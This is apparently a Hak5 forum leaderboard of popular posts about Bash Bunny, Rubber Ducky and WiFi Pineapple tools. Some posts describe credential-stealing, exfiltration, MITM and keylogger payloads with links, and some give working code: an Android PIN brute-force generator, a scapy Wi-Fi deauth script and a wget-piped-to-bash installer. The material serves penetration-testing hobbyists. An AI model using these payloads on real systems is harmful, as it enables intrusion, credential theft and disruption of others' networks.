Leaderboard


Popular Content

Showing content with the highest reputation since 03/28/2017 in all areas

  1. 12 points
    Introducing Bash Bunny firmware v1.1

    A feature packed firmware awaits Bash Bunny users just one month after release. We're excited to announce version 1.1, including many new features, conveniences, bug fixes and refined experiences. The newly improved LED command adds patterns in addition to variable blinks, as well as standardized payload states for common stages such as setup, attack, cleanup and finish. The Bash Bunny framework now includes support for extensions which augment the bunny scripting language with new commands and functions. Tools can now be installed with ease by copying .deb packages or entire directories to the dedicated /tools folder on the flash drive in arming mode. Updating ducky languages is now just a matter of copying json files to the dedicated /languages folder on the flash drive in arming mode. Many more features, fixes and experiences in the full changelog - so hop on over to BashBunny.com/downloads and nab version 1.1 today! (\_/)
  2. 9 points
    This payload exfiltrates specified documents to the Bash Bunny via SMB (Windows File Sharing). https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/smb_exfiltrator The first stage injects keystrokes into the run dialog. The powershell one-liner waits until the Bash Bunny appears as a network, then copies files and exits. The powershell runs in a minimized state to limit visual impact on the target. The second stage switches the attack mode from HID to RNDIS_ETHERNET and sets up an SMB server using Impacket. It then waits for files to finish copying from the target to a temp directory. Once exfiltration is complete, files are moved to a named and numbered loot directory on the USB disk partition. A video walk-through can be found on Hak5 episode 2202: https://www.youtube.com/watch?v=VPhqD__lOBQ Version 1.0 of this payload uses conservative delay values and is not optimized yet for speed. A number of powershell aliases and shortcuts can be used to limit the first stage, while the function which waits for files to finish copying can also be improved. Hope you like guys! Cheers from Indonesia :) --Darren
  3. 5 points
    Wifi Pineapple - Themes
    Github: https://github.com/kbeflo/pineapple-themes
    Dark Theme Install:

        wget -qO- https://raw.githubusercontent.com/kbeflo/pineapple-themes/master/dark/install-dark.sh | bash

    Screenshots:
  4. 5 points
    Hello all, being a proxy engineer when I got the Bash Bunny the first thing I thought of was how can I force people who are (excuse my assumptions here) lazy to lock their machines when they walk away and leave them vulnerable. As a pentester an unlocked and unattended machine is a gold mine but you sometimes only have those few precious seconds to gather the data you need. If you could set a proxy and more importantly an SSL proxy by inserting your certificate as well you could gather all the intel you need even after the initial attack. Enter Proxy Interceptor (Geeky name I know), this payload will enable the proxy settings and import the proxy certificate to the certificate store allowing you to man-in-the-middle the user's web traffic including gathering credentials for later escalation use in the pentest. The payload is simple using PowerShell and Ducky Script and the end of the payload will even eject the bash bunny so you can just unplug and walk away. The script is 1.0 so there is more I want to do with it later including adding support for Firefox, running confirmation tests, dropping a script for persistence, and more. As of now this only affects IE and Chrome. Also there is no failure detection as of yet in the PowerShell scripts; you just will not get the purple LED to confirm it is completed. I would love to hear your thoughts. https://github.com/ajmatson/bashbunny-payloads/tree/master/payloads/library/Proxy_Interceptor
  5. 5 points
    I am working on a new payload that will act as a web gui for standard BashBunny functions. The idea is that you keep this payload in one switch folder, and run it from a non-target. The BB will spin up a php server, and serve a local website at http://172.16.64.1 With the gui up, you can execute daisy chained shell commands in the 'console', or quickly swap out payloads found in the git repo, to the other switch folder. The repository url can easily be swapped out for your own fork, so you can quickly pull down changes, and make debugging payloads easier. Check out the repository and tell me what you think.
    To do (I might submit the pull request before these tasks are done, and make them a future enhancement):
      - Write help page (or leave it as is)
      - integrate existing terminal emulator in place of custom 'console'
    https://github.com/mathew-fleisch/bashbunny-payloads/tree/master/payloads/library/BrowserBunny
  6. 5 points
    Don't fuck with the school computers. We hate that shit.
  7. 5 points
    I'll be demoing this on next week's Hak5 episode but figured I'd post it here first and get some feedback. Thus far it works perfectly on a Galaxy Nexus running the latest Android 4.2.1. I've also tested it with a Galaxy Note 2 running 4.2.1 and it ran as expected. I'm very surprised that with the stock Android OS and recommended settings of setting a PIN code this was possible. I had expected the phone to reset or format after 100 attempts or something like that. With a 4 digit PIN and the default of 5 tries followed by a 30 second timeout you're looking at a best case scenario of exhausting the key space in about 16.6 hours. Not bad all things considered. If you're the NSA or the Mafia that's totally reasonable, I'd say. Thankfully the USB Rubber Ducky never gets tired, bored or has to pee. Rather than post the nearly 600K duckyscript I'll just post the bit of bash I used to create it. You could modify it to do 5 digit, but that would take 166 hours. 10 digit would take 1902.2 years. ;-)

        echo DELAY 5000 > android_brute-force_0000-9999.txt; echo {0000..9999} | xargs -n 1 echo STRING | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_0000-9999.txt
  8. 4 points
    Okay all, I finally finished this thing well enough for me to release but more work yet to be done. It works. Try it out and let me know what you think. I got tired of fiddling with it and just decided to get something out there. https://github.com/PoSHMagiC0de/BBTPS Oh, my first time actually using github too. I usually have friends in town who do pushes on my behalf... cause I am lazy. I decided to learn git and do it myself.
  9. 4 points
    So I wanted to mimic the Mimikatz ducky script that was used in Mr. Robot. I also figure that since there's an ethernet attack why not dl/upload from a small python webserver instead of sending externally. Plus don't have to worry about mounting the bunny drive to exfiltrate. Basically it starts with a HID powershell attack with UAC bypass, sleeps until the RNDIS ethernet attack starts, then resumes to download a mimidogz powershell script that executes in memory, then POSTs the results to python webserver. Finally the data is moved to the loot folder and the attack is done. https://github.com/xillwillx/bashbunny-payloads/tree/master/payloads/library/MrRobot
  10. 4 points
    Jacks the Browsers/Windows/WiFi/SSH passwords and install config files from Windows boxes by downloading a Powershell script into memory then stashes them in /root/udisk/loot/JackRabbit/%ComputerName% https://github.com/xillwillx/BashBunny/tree/master/JackRabbit tested on Win 7/8/10 may need to change some Delay timings and IE/Edge cred dump not working in 7
  11. 4 points
  12. 4 points
    wlan0 hosts the AP(s) while wlan1 does sniffing and injection. An optional wlan2 (USB Adapter) may be used for various purposes, such as Client Code / WiFi Tethering. wlan1 is on the vent/SD side of the NANO while wlan0 is on the opposite side. Total output power (EIRP) is calculated by adding txpower (dBm) and antenna gain (dBi). Replacing the stock antennas with your average 5 dBi dipoles will effectively double the output power. 9 dBi antennas, while ridiculous looking, will result in a 5x increase over stock. Just for fun here's a comparison:
  13. 3 points
    So with the new firmware 1.1, we now have extensions. Here is my contribution, it sets the input keyboard layout to en-US (US keyboard) to provide an easier way to work with the payloads. Granted there is a DUCKY_LANG option, however it's still a bit wanky for me and from reading the forums for some others. This way, you don't need to worry about different layouts.

    ----------------------------------setkb.sh--------------

        #!/bin/bash
        #
        # SETKB v1 by @elkentaro
        # Simplifies executing commands from HID attacks for different language keyboards on Windows by using Powershell.
        # Usage: SETKB en-US [give the command the 2 letter combination of keyboard settings]
        # copy the text of and save it as setkb.sh under /payloads/library/extensions/
        # Examples:
        # SETKB en-US (set the keyboard layout to a US keyboard layout) [usage prior to HID attack]
        # SETKB ja-JP (set the keyboard layout to a Japanese 106 layout) [usage after HID attack to reset the env]
        function SETKB() {
            local kb=$1
            shift
            [[ -z "$kb" ]] && exit 1 # KB keyboard parameter must be given.
            case "$kb" in
                'en-US')
                    QUACK GUI r
                    QUACK DELAY 500
                    QUACK STRING "powershell.exe Set-WinUserLanguageList -LanguageList en-US -force"
                    QUACK DELAY 1500
                    QUACK ENTER
                    ;;
                *)
                    QUACK GUI r
                    QUACK DELAY 500
                    QUACK "STRING powershell.exe Set-WinUserLanguageList -LanguageList $kb -force"
                    QUACK DELAY 1500
                    QUACK ENTER
                    ;;
            esac
        }
        export -f SETKB

    ------------------------------------------------

    Minor note: This extension does require that the "-" key is the same key code as the one in us.json.
  14. 3 points
    Yeah, it's possible old payloads do not work in regards to LED codes, and bunny_helpers.sh is now outdated. We will be pushing changes to the github payloads repository today. This is correct -- we do not ship any tools by default (this is up to the user), and we do not support languages other than us right now. Once people create and verify other keyboard layouts, they will be added to the payloads repository, and therefore make it to users' Bash Bunnies. If you are waiting for a language, it's really not too difficult to modify the us.json for your layout. There is no need, as factory resetting your Bash Bunny will ALWAYS revert it back to 1.0_167. DO NOT DO THIS!!! I am actually going to remove your post because we DO NOT want users to modify the recovery partition. If you break it, you brick your Bash Bunny. This is only partially correct. We install .deb files AND move folders / files over to /tools Funny you should say that, I already packaged these for Darren, but he hasn't made the links public yet. Once he pushes his updated payloads, I'm sure he'll make the links available. Simple. Unity is probably one of the most wide-spread DEs out there, due to the sheer amount of Ubuntu users. While Ubuntu is switching to GNOME, that's not happening until next year. I'm sure we'll have support for other OS / DE combinations by then. I'll be on irc.hak5.org #bashbunny all day today to answer any questions you guys might have.
  15. 3 points
    Have you tried using something like:

        grep -orEH "(sub|new)" * | sed -re's|^([^:]*):(.*)$|\2:\1|' | sort

    The sed part switches the file name and matched keyword round so that the sort can then sort the output into keyword order. If you don't want duplicates to appear then simply pipe the output through uniq (if you supply uniq with the -c option then it'll give you count of how many times that keyword appears in that file).
  16. 3 points
    https://github.com/xillwillx/BashBunny/tree/master/PrivEscChecker
    Checks Windows box for unpatched vulns that allow privilege escalation then outputs results to /root/udisk/loot/PrivEscChecker/%ComputerName%-%username%
    Can be used locally or webdls the script from github
    Credits to rasta-mouse for their powershell script: https://github.com/rasta-mouse/Sherlock
    Tested on: Windows 7 SP1 32-bit / Windows 7 SP1 64-bit / Windows 8 64-bit / Windows 10 64-bit
    LED Status
      - Blue (blinking): Running Powershell script
      - Purple (blinking): Checking Results
      - Green (blinking): Found Possible Privilege Escalation
      - Red (solid): No Possible Privilege Escalation
    TO-DO
      Add more priv checks, Eventually add PowerShellMafia/PowerSploit to check for unquoted paths, dll hijacking, editable services, and other misconfigurations...
  17. 3 points
    Hi, I love the bootstrap interface on the pineapple but the very bright default colours give me terrible eyestrain. So I made this and thought I would share. WIFIPineapple-TETRA-NANO-Themes https://github.com/3mrgnc3/WIFIPineapple-TETRA-NANO-Themes?files=1 Hope others enjoy it too. EDIT: I'll post some screenshots tomorrow so people can see it properly before trying it out. I don't have my TETRA powered up right now and it's sleepy time here in the UK right now. If anyone else has any themes/skins and wants to, they can send me a link and I'll add them to the repo. I intend to have a go at making a theme changer module sometime in the near future. When I get time that is. UPDATE... Here are the screenshots I promised. 3mrgnc3
  18. 3 points
    No. Every USB Rubber Ducky has a Firmware installed onto the Chip itself. The Firmware is what makes the USB Rubber Ducky be detected as a HID (Keyboard). Have a look at the Wiki as stated in my previous post. There you can find information about flashing a new firmware onto the USB Rubber Ducky. The TwinDuck Firmware makes it so that the USB Rubber Ducky is detected as a HID (Keyboard) and as a USB Storage Device simultaneously so that you can access your SDCard while the Rubber Ducky is plugged in and start Programs from it. I really suggest that you have a look at the Wiki.
  19. 3 points
    I think one of the benefits of having a solid open source Community, is so that you have a lot of people making tweaks and giving input so that the payloads work best in as many environments as possible. Payloads are meant to be tweaked to fit the environment you're targeting. All that being said, as someone with a software development background, typically you won't release a piece of software with only one version and have it work perfectly right out of the box. This is why normal programs that you run on your computer need to be updated often. Recon is a huge part of any engagement. You always want to know your target, so you know which attacks you need to bring to the table. I've had great success with the Rubber Ducky, the Pineapple, and even the latest Bash Bunny; however these tools have a tendency to be picked up by script kiddies who just want these to work with little or no effort, so they can be "hackers". Like Mr. Robot... on TV.
  20. 3 points
    What are your thoughts on a subforum for new/updated payloads only? People seem to be creating quite a few payloads, and pull requests seem to be quite slow to get reviewed/merged. I suggest a subforum, e.g. `Home > Active Projects > Bash Bunny > Payload Discussion` for people to post new payload threads which will allow forum visitors to easily find and try new payloads and provide input before Github merges. Support, features suggestions, etc can stay in the parent forum.
  21. 3 points
    You can use this helper to debug: https://github.com/bg-wa/bashbunny-payloads/blob/bunny_debug_helpers/payloads/library/bunny_debug_helpers.sh
    1.) Include the helper at the top of your script:

        source bunny_debug_helpers.sh

    2.) Pepper your script with log entries to see where events succeed.

        debug_log "Attack Mode Set" #ln. 41
        debug_log "IP Address : ${TARGET_IP}" #ln 92

    3.) Plug in Bunny... bash bash bash...
    4.) When finished, set the Bunny to arming mode and view your debug logs in the newly created "Debug" folder.
  22. 3 points
    Yes, you can remap the language files. We'll let you know more in the next couple of days.
  23. 3 points
    Yah, I am totally puzzled... But I contacted the Hakshop and they're gonna fix me up. Just to go public on this, The Hak5 Team stands by their products as well as their customers. Looking forward to continue buying from them!!
  24. 3 points
    Hey guys, I was talking with Seb on irc and he tells me that you cannot directly share the connection on a mac, as of now. However, it does work if you use a linux vm (I am using ubuntu in virtualbox) on top. The sequence is a little tricky and took me a while to figure out; so I'll describe how I got my bunny connected to the internet on my mac:
      1. With your vm turned off and the bunny unplugged, go to Settings > Ports > USB and enable usb 3.0
      2. Switch the bunny to state 1; plug it in and wait for it to load completely
      3. Add a usb filter (plus icon) and add the device (mine says "Linux 3.4.39 with sunxi_usb_udc RNDIS/Ethernet Gadget [0333]")
      4. Eject the bunny
      5. Flip the switch to states 2 & 3 and repeat steps 2-4
      6. Turn on your vm and keep the bunny unplugged
      7. wget the bb.sh script in the vm
      8. Run `sudo bash bb.sh` and follow the guided setup
      9. With the bunny NOT in arm mode (position 3) plug the bunny in after the third step/question
      10. If you did it right, the script will "detect" the bunny at this stage
      11. The last step is to press "C" once you see the main menu again to "connect" using the settings you just set up
      12. You should now be able to ssh in and test the connection with ping
    Hope this helps somebody.
  25. 3 points
    Papers allows you to easily create and manage certificates generated by OpenSSL. Features include:
      - Building TLS/SSL certificates for web and applications.
      - Exporting certificates to PKCS#12 containers.
      - Encrypting certificates.
      - Automatic configuration of Nginx for secure interaction with the Pineapple web interface.
      - Error logs for easy troubleshooting.
    Once the ngx_http_ssl_module is available on the NANO this module should be ready for release.
    Here is a video tutorial of Papers
    Here is a video tutorial with new features:
  26. 3 points
    I've been working on a project that I think some of you will find interesting. I wanted to see a map of the WiFi networks in my area, and be able to filter on things like encryption. The closest thing I found was the map on wigle.net, which wasn't anywhere near as detailed as I had envisioned. So I started almost from scratch, and built my own solution, based on data collected through the WiGLE Android app. It's possible to search and filter on a number of network properties, as well as show detailed info on where a particular network has been spotted. It's also possible to import data from airodump-ng, and see which clients have been connected to an access point (based on MAC addresses), and the SSIDs probed by that client. It's come a long way since the first POC version, and is now working quite nice, once you have it set up. It is available on GitHub, with link to a live version. I've been learning HTML/CSS/JavaScript/PHP/MySQL while making this, so there are bound to be some bugs, and less-than-optimal code. Please take a look, and tell me what you think.
  27. 3 points
  28. 3 points
  29. 3 points
    First thing, and I say this kindly, learn to look around forums before posting questions. Learn to use the search function, learn how to google things. Second, test on what you own. Thirdly, here's a whole topic that should get you started:
  30. 3 points
        #!/bin/bash
        # Summarize a PineAP log: unique probes, devices, OUIs and manufacturers.
        if [ -z "$1" ]; then
            echo "Usage: analyze.sh input_file output_file";
            exit
        fi
        # Build a trimmed OUI-to-manufacturer lookup file on first run.
        if [ ! -f oui-small.txt ]
        then
            echo "Downloading OUI Database"
            wget http://standards.ieee.org/regauth/oui/oui.txt
            echo "Database downloaded. Fixing up oui.txt"
            cat oui.txt | grep "base 16" | sed "s/(base 16)//g" | cut -c 3- | sed "s/\t//g" | sed "s/ / /g" > oui-small.txt
        fi
        echo -e "Processing PineAP Log\n"
        rm /tmp/analyze_tmp &>/dev/null
        rm $2 &>/dev/null
        # Look up the manufacturer for the MAC address (field 7) of every log line.
        while read i; do
            OUI=$(echo $i | awk {'print $7'} | cut -c 1-8 | sed "s/://g" | awk '{print toupper($0)}')
            grep $OUI oui-small.txt | awk {'print $2'} >> /tmp/analyze_tmp
        done < $1
        unique_manufacturer=$(cat /tmp/analyze_tmp | awk '{print tolower($0)}' | sed "s/,//g" | sort | uniq | wc -l)
        # The counts below read the input file given as $1 (the original hardcoded pineap.log here).
        printf "Unique:\n" >> $2
        printf " Probes: " >> $2 && cat $1 | awk {'print $10'} | sed "s/'//g" | sort | uniq | wc -l >> $2
        printf " Devices: " >> $2 && cat $1 | awk {'print $7'} | sort | uniq | wc -l >> $2
        printf " OUIs: " >> $2 && cat $1 | awk {'print $7'} | sort | cut -c 1-8 | uniq | wc -l >> $2
        printf "Manufacturers: $unique_manufacturer\n\n" >> $2
        printf "Top 10 Manufacturers:\n" >> $2
        cat /tmp/analyze_tmp | sed "s/,//g" | sort | uniq -c | sort -g -r | head -10 >> $2
        printf "\nTop 10 Probe Requests:\n" >> $2
        cat $1 | awk '{print $10}' | sort | uniq -c | sort -g -r | head -10 >> $2
        cat $2
        printf "\n"

    Here you go!
  31. 2 points
    Please, Please, Please anyone that reads this stop bothering Mubix with sales issues. This: https://hakshop.com/pages/policy
  32. 2 points
    UPDATE: https://github.com/Vinc0682/bashbunny-payloads/tree/master/payloads/library/phishing/WinKeylogger
    The payload:
      - Is now faster (thanks to @jafahulo)
      - Now supports exfil via a webserver, just copy the backend.php to a server supporting PHP and copy the URI into the powershell script
    Also, there've been some major changes to the keylogger to make adding future exfil methods (like the wip SMB exfil) easier.
  33. 2 points
    I've been playing around with this kind of stuff on my phone. Managed to get BunnyWeb (python web server that runs on the BB) working on my Android phone, with access to the HTML website on my phone. Also, there is a list of shortcuts you can use to control the Android phone via a HID attack. Here's a link to a list of shortcuts. For obvious reasons, powershell/batch payloads will not work on an Android phone. Kind of sad, considering how powerful they are. You could potentially turn your phone into a WiFi Pineapple with the BB plugged in using the phone's hotspot...Ooo, that could be fun...
  34. 2 points
    Same kind you can do with any linux box. I mean that's a pretty broad question. You just have to remember that there's not a lot of processing power, so it would be more useful to get the passwords or hashes you want cracked with the Pi then transfer it to another system to do the bruteforce work.
  35. 2 points
    It's a ham radio term. The "fox" is your target. The "hounds" are your radios. It's also the same way we find radio tagged animals in the wild. You have your listening device with a directional antenna. Tune it to the target frequency, and start pointing it till the signal gets strongest. Note the direction on your map (draw a line). Move to a location not towards your target and find it again, note the direction ('nother line). Where the two lines cross, is close to your target. Go to that spot and start over. I've done the same thing to find rogue access points using a sharp zaurus and a modified compact flash wireless card. https://goo.gl/photos/XWfj3P7ardqm9jZJ7
  36. 2 points
    Sorry for not answering SBB's question. I didn't notice that someone had posted until RazerBlade did. I'll try to explain what's going on with those errors that you're getting. It is obviously related to the SD-card and some kernel-modules that handle the filesystem. (ext4, JBD2, or the SD-card itself) I have encountered this issue as well, though not the exact same error-messages, they are very similar. The same thing also happens: The SD-card "disconnects" from the Nano, and then re-appears with a new identifier each time: (/dev/sda -> /dev/sdb -> /dev/sdc -> and so on) This error is NOT related to Mana Toolkit. It appears that simply writing/reading to the SD-card triggers it. You can trigger this bug easily without even having Mana Toolkit installed. (By running a badblock scan on the SD-card) Even running wifite from my SD-card triggers it and becomes a big problem. I've tried to forward these kernel-errors to Hak5, with other information I've stumbled over. For example: Other people are having similar problems on the Raspberry Pi while using the same kernel-version 3.18.x. So to answer your question: It looks like it's a "bug" within a kernel-module. So what's the remedy? Without fixing the bug, the only solution I've found is to take out the SD-card and insert a USB thumb-drive. Then proceed to mount this thumb-drive as /sd. (Just format it exactly like your sd-card is formatted.) Hope this cleared things up a bit. I've seen lots of people experiencing this problem.
  37. 2 points
    I forgot to mention that the reason you are getting warnings about missing libpcap.so.1.3 when trying to run Reaver/wash/Bully, is because those programs are compiled with that version of libpcap. If you want to get rid of those warnings, you would need to either sym-link, or compile Reaver, Bully etc. with the newest libpcap. So I've also compiled Bully and Reaver alongside libpcap-1.8.1. This is not the "normal" version of Bully or Reaver. It's Aanarchyy's and t6x version, which has added Pixiewps functionality. (Works better in my opinion) So installing these, should let you avoid sym-linking after installing libpcap :)
    Source repos. are listed here:
      https://github.com/t6x/reaver-wps-fork-t6x
      https://github.com/aanarchyy/bully
    Link to IPK's below:
      Reaver: https://mega.nz/#!75EikSzL!L0Ux0hhm-R8YvSjHqoZ9wRHxBsiS6VFxW2adkLFuCfE
      Bully: https://mega.nz/#!2oNj0YgA!1PzGr-JxbjPO1DAl4x7SCfCVtg4LtXPk6lLl82V0r8U
      libpcap-1.8.1: https://mega.nz/#!atdFiRLA!gjnqKAxCd2w_2vBTpVstwYkaHbbZE_dSWHe3N1T0kkM
  38. 2 points
    JHack, Here is what I did to get responder to work on BB 1.1
      1. Download the responder repo to a zip file. https://github.com/lgandx/Responder/
      2. Extract the zip file, Rename Responder-master to responder.
      3. Copy that responder to /tools/ on the USB drive while in arming mode.
      4. Safely Eject.
      5. Plug the bunny back in, it will flash purple briefly then go blue.
      6. Connect via Serial, or SSH and verify you have a /tools/responder folder.
    I would think impacket would work the same way since like responder it's a collection of python scripts. https://github.com/CoreSecurity/impacket
  39. 2 points
    It never goes through the upgrade process, just goes straight from green to blinking blue. I'll try and do a recovery **EDIT** All good after the recovery, device must have been in a weird state, for anyone else who gets same issue to fix, insert and pull it out as soon as the green light turns off (do this 3 times) on the 4th insert it will go into recovery mode. Once this is done remove the bunny (use the safe removal feature on windows) and then making sure that you have the file still in root insert the bunny again and it will flash the new firmware. As LVT mentioned above after the flash of new firmware you should have a text file called version.txt inside should be 1.1_228 PS LowValueTarget thanks for the help and advice above :-)
  40. 2 points
    Can't hurt to have -- added to firmware.
  41. 2 points
    Uses a HID/Ethernet Attack to run a RickRoll powershell script https://github.com/xillwillx/bashbunny-payloads/tree/master/payloads/library/RickRoll
  42. 2 points
    Nice idea - I just had a play and seem to have ADB (mips) installed on my bunny. But I haven’t tested operation. I followed instructions here and here; the dependencies were already installed on the bunny - it suggests to use aptitude to install the adb package so I installed and used that.

        root@bunny:~# adb
        Android Debug Bridge version 1.0.31

    But maybe you got this far already and had problems with operation?
  43. 2 points
  44. 2 points
    I have to agree with @Rkiver. I've only been doing this for 3 months and officially on the forum for a month and I have found that self teaching is the way to go, so I'm only new to this as well. Find something that interests you and start there. For instance everyone says start with Python but I haven't even written 1 python script yet. I have however been learning Powershell for ducky script and I have learnt so much it's not funny, Powershell is extremely powerful. I have also been learning networking and html. Just pick something you can see yourself using and start researching that.
  45. 2 points
    Psh. lame. It's only useless if you don't use it.
  46. 2 points
    Yes, we should absolutely hire that guy to do our marketing. Anyway, thanks for the wish list. :)
  47. 2 points
    thanks for the reply - very helpful - I had no idea you could install scapy on the pineapple. Here is a script I wrote in python using scapy to perform a de-auth with a specific reason code. It takes care of setting the channel, etc... but you have to run airmon-ng check kill and airmon-ng start wlan0 (whatever your interface is). There are some devices that will behave differently depending on the reason code you send in the de-auth. Here is a link to a list of the auth and de-auth reason codes and what they all mean/are for. https://supportforums.cisco.com/document/141136/80211-association-status-80211-deauth-reason-codes

        import sys
        from scapy.all import *
        print "Syntax: deauth.py <BSSID MAC> <Client MAC or ff:ff:ff:ff:ff:ff> <Interface> <channel>"
        print "Example: deauth.py 00:aa:33:bb:77:cc 00:aa:44:dd:88:ee wlan0mon 153"
        iw="iwconfig "+sys.argv[3]+" channel "+sys.argv[4]
        numpackets=150
        hitinter = 0.001
        print "Setting Channel with "+iw
        os.system(iw)
        print "Sending deauth as BSSID "+sys.argv[1]+" to client MAC address "+sys.argv[2]+" on channel "+sys.argv[4]
        print "On interface "+sys.argv[3]
        pkt = RadioTap () / Dot11( addr1 = sys.argv[2], addr2 = sys.argv[1], addr3 = sys.argv[1])/ Dot11Deauth(reason= 7)
        sendp(pkt, iface = sys.argv[3], count = numpackets, inter = hitinter)
        print "Complete."
  48. 2 points
    172.16.64.10 will be the IP address your host machine has been assigned. The IP address of the bunny will be 172.16.64.1
    Default values from the wiki are:
      Username: root
      Password: hak5bunny
      IP Address: 172.16.64.1
      DHCP Range: 172.16.64.10-12
  49. 2 points
    So basically you are saying your first post was BS :) Either way, I don't think you'll get any help here.
  50. 2 points
    Yes, I am new. I have very few posts and I don't contribute much because I'm still learning. I can't help but be discouraged by a lot of posts on these forums though. I purchased my nano tactical elite and field kit this past Father's day. I guarantee that it's been the best gift that my wife has ever gotten me. After looking at the nano for nearly a year prior to purchase, I took the first step by purchasing a used Nexus 6 for $100. The next step was the Google Fi program, followed by the Hak5 gear. When it all arrived, I connected it without issue, and went to work. It wasn't long before I realized that I had seriously overestimated my knowledge. To be honest, I had no idea what the hell I was doing. I watched the Pineapple university videos numerous times, dug through YouTube, read the forum, and ordered the book. It didn't take but a couple of reboots to realize what modules didn't work together. Before long, I realized I couldn't proceed without even more understanding and knowledge. That was rectified by a Python for informatics course, some raspberry pi tinkering, and finding some local programmers who were glad to help. Now, I understand that there might be some faulty Pineapples out there, but that's not what I'm really seeing in the majority of these posts. What I'm seeing are people who simply don't know what the hell they're doing. The vast majority of the "I paid a $100 for a brick" people are simply too lazy to search for continuing education. Either their ego is too large to fathom the idea of not being spoon fed answers or they want the "I'm a hacker, watch me get the lulz by pushing a button kit". I've never had an issue with shipping, contacting the store, or anything for that matter. I realize that I'm no expert. Hell, there's still a majority of the field kit that remains untouched. I haven't ventured into the rubber ducky, LAN turtle, or SDR. 
Actually I'm fairly positive that I still don't even know what some of the items are or what they do. You can bet your technolust ass that I'll eventually learn though! All I'm trying to say in this drawn out post is...if you want to better yourself or your understanding, shut up and do it.